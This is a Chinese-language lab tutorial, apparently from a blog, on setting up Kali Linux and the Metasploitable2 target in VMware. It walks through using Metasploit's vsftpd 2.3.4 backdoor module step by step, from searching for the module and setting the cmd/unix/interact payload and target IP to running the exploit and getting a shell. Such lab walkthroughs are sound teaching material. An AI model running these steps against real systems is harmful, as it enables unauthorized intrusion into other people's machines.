本文仅作学习参考使用
一、虚拟机&&靶机的准备
1)kali linux的安装
https://www.kali.org/get-kali/#kali-virtual-machines
2)Vmware虚拟机的安装
3)靶机metaploitable2的安装
下载地址:https://sourceforge.net.projects/metasploitable/
(如果虚拟机的安装教程请参考其他文章,如果kali linux的安装出现问题,可以私信或留言博主,我发已经调试好的kali linux给大家。需要靶机的安装包同样也可以私信或者留言)
二、使用kali机完成对第三方靶机Matesploitable的渗透攻击
1.在kali的终端输入msfconsole
(每次启动的界面都是不一样的,不必困扰)
2.输入search vsftpd查看所具有的漏洞利用代码
3.将搜索到的内容进行利用
----exploit/unix/ftp/vsftpd_234_backdoor
输入 use exploit/unix/ftp/vsftpd_234_backdoor
4.输入show payloads
来查看可以用的payloads
5.输入set payload cmd/unix/interact 进行设置payload
6.设置rhost,将ip地址设置为192.168.1.103(靶机的ip地址),并查看结果
注:靶机的ip地址要提前到靶机上查询
7.输入exploit进行溢出
如果可以看到反弹成功,得到shell,输入ifconfig,查看靶机ip地址。
以上内容仅供学习参考使用。